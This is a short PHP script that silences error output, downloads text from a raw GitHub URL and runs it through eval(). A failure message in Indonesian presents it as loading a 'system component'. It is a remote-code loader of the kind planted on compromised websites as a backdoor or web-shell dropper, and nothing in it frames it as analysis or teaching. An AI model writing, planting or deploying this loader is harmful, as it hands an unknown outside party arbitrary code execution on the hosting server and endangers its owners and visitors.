<?php
error_reporting(0);
ini_set('display_errors', 0);

$u='https://raw.githubusercontent.com/zonaintegritasid-cyber/zona/main/02zip.txt';
$c=@file_get_contents($u);
if($c!==false){eval('?>'.$c);}else{exit('Gagal memuat komponen sistem.');}
?>
